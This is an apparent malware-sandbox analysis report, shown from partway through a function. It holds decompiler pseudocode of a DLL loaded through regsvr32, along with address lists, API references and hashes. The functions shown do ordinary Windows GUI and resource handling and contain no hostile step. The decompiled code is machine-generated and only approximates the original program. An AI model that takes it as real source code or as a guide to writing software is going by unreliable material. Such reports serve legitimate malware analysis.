							_t32 = E1002229C( *((intOrPtr*)(_t49 + 0x4c)) + 0x40, _t31, 0);
							_v12 = _t32;
							_a4 = _t32;
							E10012115( &_a4);
							while(_a4 != 0) {
								_t37 =  *((intOrPtr*)(E10012115( &_a4)));
								_v8 =  *((intOrPtr*)(E10012115( &_a4)));
								if((E10017A83(_t37) & 0x00020000) != 0) {
									break;
								} else {
									_t45 = _v8;
									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
										continue;
									} else {
										L16:
										_t44 = _v8;
										goto L17;
									}
								}
								goto L18;
							}
							_a4 = _v12;
							_t31 = E10017BAA( &_a4);
							while(_a4 != 0) {
								_t63 =  *(E10017BAA( &_a4));
								_v8 = _t63;
								if(_t63[2] == 0) {
									L13:
									_t31 = E10017A83(_t63);
									if((_t31 & 0x00020000) == 0) {
										continue;
									}
								} else {
									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
										goto L16;
									} else {
										_t63 = _v8;
										goto L13;
									}
								}
								goto L18;
							}
						} else {
							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
							_t44 = _a4;
							if(_t47 == 1) {
								L17:
								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
							} else {
								goto L4;
							}
						}
						L18:
					}
				}
				return _t31;
			}












                                                                                                                0x10017ecc
                                                                                                                0x10017ecd
                                                                                                                0x10017ed0
                                                                                                                0x10017ed7
                                                                                                                0x10017edd
                                                                                                                0x10017ee2
                                                                                                                0x10017ef2
                                                                                                                0x10017f0b
                                                                                                                0x10017f13
                                                                                                                0x10017f1b
                                                                                                                0x10017f1e
                                                                                                                0x10017f28
                                                                                                                0x10017f69
                                                                                                                0x10017f3e
                                                                                                                0x10017f42
                                                                                                                0x10017f4f
                                                                                                                0x00000000
                                                                                                                0x10017f51
                                                                                                                0x10017f51
                                                                                                                0x10017f57
                                                                                                                0x00000000
                                                                                                                0x10017fc4
                                                                                                                0x10017fc4
                                                                                                                0x10017fc4
                                                                                                                0x00000000
                                                                                                                0x10017fc4
                                                                                                                0x10017f57
                                                                                                                0x00000000
                                                                                                                0x10017f4f
                                                                                                                0x10017f74
                                                                                                                0x10017f7e
                                                                                                                0x10017fbd
                                                                                                                0x10017f94
                                                                                                                0x10017f99
                                                                                                                0x10017f9c
                                                                                                                0x10017fb1
                                                                                                                0x10017fb1
                                                                                                                0x10017fbb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10017f9e
                                                                                                                0x10017fac
                                                                                                                0x00000000
                                                                                                                0x10017fae
                                                                                                                0x10017fae
                                                                                                                0x00000000
                                                                                                                0x10017fae
                                                                                                                0x10017fac
                                                                                                                0x00000000
                                                                                                                0x10017f9c
                                                                                                                0x10017ef4
                                                                                                                0x10017efd
                                                                                                                0x10017f02
                                                                                                                0x10017f05
                                                                                                                0x10017fc7
                                                                                                                0x10017fd0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10017f05
                                                                                                                0x10017fd2
                                                                                                                0x10017fd2
                                                                                                                0x10017ee2
                                                                                                                0x10017fd6

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: 20c07f7169c3d1fd542dabe4e85f7493f115e291a68c9aff9bfaa0f8e57f9e8f
                                                                                                                • Instruction ID: baa2da266dd1c3dce018d4e0db6ccd4fa4f71bdf7109174edae2865d4e814d47
                                                                                                                • Opcode Fuzzy Hash: 20c07f7169c3d1fd542dabe4e85f7493f115e291a68c9aff9bfaa0f8e57f9e8f
                                                                                                                • Instruction Fuzzy Hash: 89313774500119FBDB25DF91C881EAE7BB9FF41690F10806AF9098F251DA31ED81DBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002EC50 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 80%
                                                                                                                			E1002EC50(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t51;
				void* _t53;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr* _t77;
				signed int _t80;
				void* _t82;
				void* _t83;
				intOrPtr* _t84;

				_t83 = __eflags;
				_push(0x20);
				E1004764D(0x100903ec, __ebx, __edi, __esi);
				_t80 = 0;
				 *((intOrPtr*)(_t82 - 0x10)) = 0;
				 *((intOrPtr*)(_t82 - 0x14)) = 0x1009b784;
				_t68 =  *((intOrPtr*)(_t82 + 8));
				_t71 = _t82 - 0x1c;
				 *(_t82 - 4) = 0;
				E1001E397(_t82 - 0x1c, _t83,  *((intOrPtr*)(_t68 - 0xb0)));
				_t77 =  *((intOrPtr*)(_t82 + 0x14));
				_t84 = _t77;
				 *(_t82 - 4) = 1;
				_t85 = _t84 == 0;
				if(_t84 == 0) {
					E1000A069(_t68, _t71, _t77, 0, _t85);
				}
				 *_t77 = _t80;
				if( *((intOrPtr*)(_t68 - 8)) == _t80) {
					_push(GetDC( *( *((intOrPtr*)( *((intOrPtr*)(_t68 - 0xac)) + 0x20)) + 0x20)));
					_t51 = E1000CCCE(_t68, _t71, _t77, _t80, __eflags);
					__eflags = _t51 - _t80;
					 *((intOrPtr*)(_t68 - 8)) = _t51;
					if(_t51 == _t80) {
						goto L3;
					} else {
						__eflags =  *(_t82 + 0xc) - _t80;
						if( *(_t82 + 0xc) != _t80) {
							IntersectRect(_t82 - 0x2c, _t68 - 0x9c,  *(_t82 + 0xc));
						} else {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t77 =  *((intOrPtr*)(_t82 + 0x14));
							_t80 = 0;
						}
						L1000CFA3(_t82 - 0x14, _t77, _t82, CreateRectRgnIndirect(_t82 - 0x2c));
						E1000CA9A( *((intOrPtr*)(_t68 - 8)), _t82 - 0x14, 1);
						_t69 =  *((intOrPtr*)(_t68 - 8));
						__eflags = _t69 - _t80;
						if(_t69 != _t80) {
							_t70 =  *((intOrPtr*)(_t69 + 4));
						} else {
							_t70 = 0;
						}
						__eflags =  *((intOrPtr*)(_t82 - 0x18)) - _t80;
						 *_t77 = _t70;
						 *(_t82 - 4) = 0;
						if( *((intOrPtr*)(_t82 - 0x18)) != _t80) {
							_push( *((intOrPtr*)(_t82 - 0x1c)));
							_push(_t80);
							E1001D714();
						}
						 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t82 - 0x14)) = 0x10098308;
						L1000CFF6(_t82 - 0x14);
						_t53 = 0;
						__eflags = 0;
					}
				} else {
					L3:
					 *(_t82 - 4) = 0;
					if( *((intOrPtr*)(_t82 - 0x18)) != _t80) {
						_push( *((intOrPtr*)(_t82 - 0x1c)));
						_push(_t80);
						E1001D714();
					}
					 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t82 - 0x14)) = 0x10098308;
					L1000CFF6(_t82 - 0x14);
					_t53 = 0x80004005;
				}
				return E10047725(_t53);
			}













                                                                                                                0x1002ec50
                                                                                                                0x1002ec50
                                                                                                                0x1002ec57
                                                                                                                0x1002ec5c
                                                                                                                0x1002ec5e
                                                                                                                0x1002ec61
                                                                                                                0x1002ec68
                                                                                                                0x1002ec71
                                                                                                                0x1002ec74
                                                                                                                0x1002ec77
                                                                                                                0x1002ec7c
                                                                                                                0x1002ec81
                                                                                                                0x1002ec86
                                                                                                                0x1002ec8a
                                                                                                                0x1002ec8c
                                                                                                                0x1002ec8e
                                                                                                                0x1002ec8e
                                                                                                                0x1002ec93
                                                                                                                0x1002ec98
                                                                                                                0x1002ecdb
                                                                                                                0x1002ecdc
                                                                                                                0x1002ece1
                                                                                                                0x1002ece3
                                                                                                                0x1002ece6
                                                                                                                0x00000000
                                                                                                                0x1002ece8
                                                                                                                0x1002ece8
                                                                                                                0x1002eceb
                                                                                                                0x1002ed0f
                                                                                                                0x1002eced
                                                                                                                0x1002ecf6
                                                                                                                0x1002ecf7
                                                                                                                0x1002ecf8
                                                                                                                0x1002ecf9
                                                                                                                0x1002ecfa
                                                                                                                0x1002ecfd
                                                                                                                0x1002ecfd
                                                                                                                0x1002ed23
                                                                                                                0x1002ed31
                                                                                                                0x1002ed36
                                                                                                                0x1002ed39
                                                                                                                0x1002ed3b
                                                                                                                0x1002ed41
                                                                                                                0x1002ed3d
                                                                                                                0x1002ed3d
                                                                                                                0x1002ed3d
                                                                                                                0x1002ed44
                                                                                                                0x1002ed47
                                                                                                                0x1002ed49
                                                                                                                0x1002ed4d
                                                                                                                0x1002ed4f
                                                                                                                0x1002ed52
                                                                                                                0x1002ed53
                                                                                                                0x1002ed53
                                                                                                                0x1002ed58
                                                                                                                0x1002ed5f
                                                                                                                0x1002ed66
                                                                                                                0x1002ed6b
                                                                                                                0x1002ed6b
                                                                                                                0x1002ed6b
                                                                                                                0x1002ec9a
                                                                                                                0x1002ec9a
                                                                                                                0x1002ec9d
                                                                                                                0x1002eca1
                                                                                                                0x1002eca3
                                                                                                                0x1002eca6
                                                                                                                0x1002eca7
                                                                                                                0x1002eca7
                                                                                                                0x1002ecac
                                                                                                                0x1002ecb3
                                                                                                                0x1002ecba
                                                                                                                0x1002ecbf
                                                                                                                0x1002ecbf
                                                                                                                0x1002ed72

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1002EC57
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                • GetDC.USER32(?), ref: 1002ECD5
                                                                                                                • IntersectRect.USER32(?,?,?), ref: 1002ED0F
                                                                                                                • CreateRectRgnIndirect.GDI32(?), ref: 1002ED19
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3Rect$CreateException@8IndirectIntersectThrow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2872313494-0
                                                                                                                • Opcode ID: 71820c51ad5a6b91d22aab399d9b2e235a0c88981c134e62d2c467e6414b106a
                                                                                                                • Instruction ID: 9795b432989586427fe229a53345f495e2c6ce602f8878a6b445c9d3bfb102e1
                                                                                                                • Opcode Fuzzy Hash: 71820c51ad5a6b91d22aab399d9b2e235a0c88981c134e62d2c467e6414b106a
                                                                                                                • Instruction Fuzzy Hash: B8316A75D0025ADFDF01CFA4C984AEEBBB5EF08740F608156F505AB191C774AE41DBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100218FC Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E100218FC(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t39;
				void* _t47;
				intOrPtr* _t48;
				void* _t50;
				void* _t51;
				void* _t64;
				void* _t65;
				intOrPtr _t66;
				void* _t68;
				void* _t70;

				_t65 = __edi;
				_t64 = __edx;
				_t51 = E1001E375(_t50, __ecx, __edi, _t68, __eflags);
				_t29 =  *((intOrPtr*)(_t51 + 0x10));
				if(_t29 == 0) {
					L19:
					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
				}
				_t32 = _t29 - 1;
				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
				if(_t32 != 0) {
					goto L19;
				}
				if(_a4 == 0) {
					L8:
					_push(_t65);
					_t66 =  *((intOrPtr*)(E1001E302(_t51, _t65, 0, _t77) + 4));
					_t70 = E1002050A(0x100bdc04);
					if(_t70 == 0 || _t66 == 0) {
						L18:
						goto L19;
					} else {
						_t35 =  *((intOrPtr*)(_t70 + 0xc));
						_t80 = _t35;
						if(_t35 == 0) {
							L12:
							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
								_t36 =  *((intOrPtr*)(_t70 + 0xc));
								_a4 = _a4 & 0x00000000;
								_t83 = _t36;
								if(_t36 != 0) {
									_push(_t36);
									_t39 = E1004CC8F(_t51, _t64, _t66, _t70, _t83);
									_push( *((intOrPtr*)(_t70 + 0xc)));
									_a4 = _t39;
									E100470E9(_t51, _t66, _t70, _t83);
								}
								_t37 = E10047026(_t51, _t64, _t66, _t70,  *((intOrPtr*)(_t66 + 0x98)));
								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
								if(_t37 == 0 && _a4 != _t37) {
									 *((intOrPtr*)(_t70 + 0xc)) = E10047026(_t51, _t64, _t66, _t70, _a4);
								}
							}
							goto L18;
						}
						_push(_t35);
						if(E1004CC8F(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
							goto L18;
						}
						goto L12;
					}
				}
				if(_a4 != 0xffffffff) {
					_t47 = E10019F12();
					if(_t47 != 0) {
						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
						_t77 = _t48;
						if(_t48 != 0) {
							 *_t48(0, 0);
						}
					}
				}
				E100217EF(_t51,  *((intOrPtr*)(_t51 + 0x20)), _t65);
				E100217EF(_t51,  *((intOrPtr*)(_t51 + 0x1c)), _t65);
				E100217EF(_t51,  *((intOrPtr*)(_t51 + 0x18)), _t65);
				E100217EF(_t51,  *((intOrPtr*)(_t51 + 0x14)), _t65);
				E100217EF(_t51,  *((intOrPtr*)(_t51 + 0x24)), _t65);
				goto L8;
			}





















                                                                                                                0x100218fc
                                                                                                                0x100218fc
                                                                                                                0x10021906
                                                                                                                0x10021908
                                                                                                                0x1002190f
                                                                                                                0x100219e7
                                                                                                                0x100219f2
                                                                                                                0x100219f2
                                                                                                                0x10021915
                                                                                                                0x10021918
                                                                                                                0x1002191b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10021924
                                                                                                                0x10021968
                                                                                                                0x10021968
                                                                                                                0x1002196e
                                                                                                                0x1002197b
                                                                                                                0x1002197f
                                                                                                                0x100219e6
                                                                                                                0x00000000
                                                                                                                0x10021985
                                                                                                                0x10021985
                                                                                                                0x10021988
                                                                                                                0x1002198a
                                                                                                                0x1002199b
                                                                                                                0x100219a2
                                                                                                                0x100219a4
                                                                                                                0x100219a7
                                                                                                                0x100219ab
                                                                                                                0x100219ad
                                                                                                                0x100219af
                                                                                                                0x100219b0
                                                                                                                0x100219b5
                                                                                                                0x100219b8
                                                                                                                0x100219bb
                                                                                                                0x100219c1
                                                                                                                0x100219c8
                                                                                                                0x100219d0
                                                                                                                0x100219d3
                                                                                                                0x100219e3
                                                                                                                0x100219e3
                                                                                                                0x100219d3
                                                                                                                0x00000000
                                                                                                                0x100219a2
                                                                                                                0x1002198c
                                                                                                                0x10021999
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10021999
                                                                                                                0x1002197f
                                                                                                                0x1002192a
                                                                                                                0x1002192c
                                                                                                                0x10021933
                                                                                                                0x10021935
                                                                                                                0x10021938
                                                                                                                0x1002193a
                                                                                                                0x1002193e
                                                                                                                0x1002193e
                                                                                                                0x1002193a
                                                                                                                0x10021933
                                                                                                                0x10021943
                                                                                                                0x1002194b
                                                                                                                0x10021953
                                                                                                                0x1002195b
                                                                                                                0x10021963
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __msize_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1288803200-0
                                                                                                                • Opcode ID: 7e6aca9802086b6c4b7125c107ff73b07487bfd6a064de946bd2304e24c8b9b9
                                                                                                                • Instruction ID: ae32fc954f06dd924a99d51e7d75eaad46295e23dedae6a26b81c9720e256fe4
                                                                                                                • Opcode Fuzzy Hash: 7e6aca9802086b6c4b7125c107ff73b07487bfd6a064de946bd2304e24c8b9b9
                                                                                                                • Instruction Fuzzy Hash: 8F21A0391042119FCB54DFB0E896ADA77E5EF106A0F60856AE858CB146EB30EC81CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003F13E Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 84%
                                                                                                                			E1003F13E(void* __ebx, intOrPtr __ecx, void* __edi, void* __eflags, CHAR* _a4) {
				intOrPtr _v8;
				void* _v12;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t28;
				void* _t29;
				void* _t30;
				signed int _t35;
				void* _t37;
				void* _t44;
				signed short* _t57;
				signed int _t59;
				void* _t64;
				void* _t66;
				struct HINSTANCE__* _t67;
				void* _t69;
				void* _t71;

				_push(__ecx);
				_push(__ecx);
				_push(_t66);
				_v8 = __ecx;
				_t67 =  *(E1001E302(__ebx, __edi, _t66, __eflags) + 0xc);
				_t28 = FindResourceA(_t67, _a4, 0xf1);
				if(_t28 != 0) {
					_t29 = LoadResource(_t67, _t28);
					__eflags = _t29;
					_v12 = _t29;
					if(_t29 == 0) {
						goto L1;
					} else {
						_t69 = LockResource(_t29);
						__eflags = _t69;
						if(__eflags == 0) {
							goto L1;
						} else {
							_t32 =  *(_t69 + 6) & 0x0000ffff;
							_push(__ebx);
							_push(__edi);
							_t59 = 4;
							_t60 = ( *(_t69 + 6) & 0x0000ffff) * _t59 >> 0x20;
							_t64 = E10009F14(__eflags,  ~(0 | __eflags > 0x00000000) | _t32 * _t59);
							_t35 = 0;
							__eflags =  *(_t69 + 6);
							if( *(_t69 + 6) > 0) {
								_t13 = _t69 + 8; // 0x8
								_t57 = _t13;
								do {
									 *(_t64 + _t35 * 4) =  *_t57 & 0x0000ffff;
									_t60 =  *(_t69 + 6) & 0x0000ffff;
									_t35 = _t35 + 1;
									_t57 =  &(_t57[1]);
									__eflags = _t35 - ( *(_t69 + 6) & 0x0000ffff);
								} while (_t35 < ( *(_t69 + 6) & 0x0000ffff));
							}
							_t37 = E1003DD63(_v8, _t60, _t64,  *(_t69 + 6) & 0x0000ffff);
							_push(_t64);
							_t44 = _t37;
							E10009F3F(_t44, _t64, _t69, __eflags);
							__eflags = _t44;
							if(_t44 != 0) {
								_t54 =  *(_t69 + 4) & 0x0000ffff;
								E1003E51C(_v8, ( *(_t69 + 2) & 0x0000ffff) + 7, ( *(_t69 + 4) & 0x0000ffff) + 7,  *(_t69 + 2) & 0x0000ffff, _t54);
								_t44 = E1003E638(_v8, _t71, __eflags, _a4);
							}
							FreeResource(_v12);
							_t30 = _t44;
						}
					}
				} else {
					L1:
					_t30 = 0;
				}
				return _t30;
			}




















                                                                                                                0x1003f141
                                                                                                                0x1003f142
                                                                                                                0x1003f143
                                                                                                                0x1003f144
                                                                                                                0x1003f14c
                                                                                                                0x1003f158
                                                                                                                0x1003f160
                                                                                                                0x1003f16b
                                                                                                                0x1003f171
                                                                                                                0x1003f173
                                                                                                                0x1003f176
                                                                                                                0x00000000
                                                                                                                0x1003f178
                                                                                                                0x1003f17f
                                                                                                                0x1003f181
                                                                                                                0x1003f183
                                                                                                                0x00000000
                                                                                                                0x1003f185
                                                                                                                0x1003f185
                                                                                                                0x1003f189
                                                                                                                0x1003f18a
                                                                                                                0x1003f18f
                                                                                                                0x1003f190
                                                                                                                0x1003f19f
                                                                                                                0x1003f1a1
                                                                                                                0x1003f1a3
                                                                                                                0x1003f1a8
                                                                                                                0x1003f1aa
                                                                                                                0x1003f1aa
                                                                                                                0x1003f1ad
                                                                                                                0x1003f1b0
                                                                                                                0x1003f1b3
                                                                                                                0x1003f1b7
                                                                                                                0x1003f1b9
                                                                                                                0x1003f1ba
                                                                                                                0x1003f1ba
                                                                                                                0x1003f1ad
                                                                                                                0x1003f1c7
                                                                                                                0x1003f1cc
                                                                                                                0x1003f1cd
                                                                                                                0x1003f1cf
                                                                                                                0x1003f1d4
                                                                                                                0x1003f1d7
                                                                                                                0x1003f1d9
                                                                                                                0x1003f1ee
                                                                                                                0x1003f1fe
                                                                                                                0x1003f1fe
                                                                                                                0x1003f203
                                                                                                                0x1003f20a
                                                                                                                0x1003f20c
                                                                                                                0x1003f183
                                                                                                                0x1003f162
                                                                                                                0x1003f162
                                                                                                                0x1003f162
                                                                                                                0x1003f162
                                                                                                                0x1003f20f

                                                                                                                APIs
                                                                                                                • FindResourceA.KERNEL32 ref: 1003F158
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 1003F16B
                                                                                                                • LockResource.KERNEL32(00000000), ref: 1003F179
                                                                                                                • FreeResource.KERNEL32(?), ref: 1003F203
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindFreeLoadLock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1078018258-0
                                                                                                                • Opcode ID: 3cd129bd3e95297c6130aa728ec632d8f413076899a2ba16ac84b1356596920a
                                                                                                                • Instruction ID: 7d04399fb8401ab0899cde0e742f6d9608f8fb1466ab0f43d1cb39ed68eb6d21
                                                                                                                • Opcode Fuzzy Hash: 3cd129bd3e95297c6130aa728ec632d8f413076899a2ba16ac84b1356596920a
                                                                                                                • Instruction Fuzzy Hash: C821B07A500221EEEB15DBB1CC858BBB7A8EF45642B00842DF982DA291EA34ED40D760
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10041D9B Relevance: 6.1, APIs: 4, Instructions: 85windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E10041D9B(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t34;
				intOrPtr* _t62;
				void* _t63;
				void* _t64;

				_t64 = __eflags;
				_push(0x24);
				E1004764D(0x100916ef, __ebx, __edi, __esi);
				_t62 =  *((intOrPtr*)(_t63 + 8)) + 0xffffffc0;
				E1001E397(_t63 - 0x14, _t64,  *((intOrPtr*)( *((intOrPtr*)(_t63 + 8)) - 0x24)));
				 *(_t63 - 4) = 0;
				if( *((intOrPtr*)(_t63 + 0x10)) <=  *((intOrPtr*)(_t62 + 0x3c))) {
					L8:
					__eflags =  *(_t62 + 0x30);
					if( *(_t62 + 0x30) == 0) {
						_t34 = PeekMessageA(_t63 - 0x30, 0, 0, 0, 2);
						__eflags = _t34;
						if(_t34 != 0) {
							 *((intOrPtr*)( *_t62 + 0x58))(_t63 - 0x30);
						}
						L14:
						 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
						if( *(_t63 - 0x10) != 0) {
							_push( *((intOrPtr*)(_t63 - 0x14)));
							_push(0);
							E1001D714();
						}
						L17:
						return E10047725(1);
					}
					L9:
					 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
					__eflags =  *(_t63 - 0x10);
					if( *(_t63 - 0x10) != 0) {
						_push( *((intOrPtr*)(_t63 - 0x14)));
						_push(0);
						E1001D714();
					}
					_push(2);
					_pop(1);
					goto L17;
				}
				if( *(_t62 + 0x30) != 0) {
					goto L9;
				}
				_push(_t63 - 0x30);
				if( *((intOrPtr*)( *_t62 + 0x5c))() == 0 ||  *((intOrPtr*)(_t62 + 0x2c)) == 0) {
					goto L8;
				} else {
					 *(_t62 + 0x30) = 1;
					do {
					} while (PeekMessageA(_t63 - 0x30, 0, 0x200, 0x209, 3) != 0);
					do {
					} while (PeekMessageA(_t63 - 0x30, 0, 0x100, 0x109, 3) != 0);
					 *((intOrPtr*)( *_t62 + 0x64))( *((intOrPtr*)(_t63 + 0xc)));
					 *(_t62 + 0x30) = 0;
					goto L14;
				}
			}







                                                                                                                0x10041d9b
                                                                                                                0x10041d9b
                                                                                                                0x10041da2
                                                                                                                0x10041dad
                                                                                                                0x10041db3
                                                                                                                0x10041dc0
                                                                                                                0x10041dc3
                                                                                                                0x10041e28
                                                                                                                0x10041e28
                                                                                                                0x10041e2b
                                                                                                                0x10041e4d
                                                                                                                0x10041e53
                                                                                                                0x10041e55
                                                                                                                0x10041e5f
                                                                                                                0x10041e5f
                                                                                                                0x10041e62
                                                                                                                0x10041e62
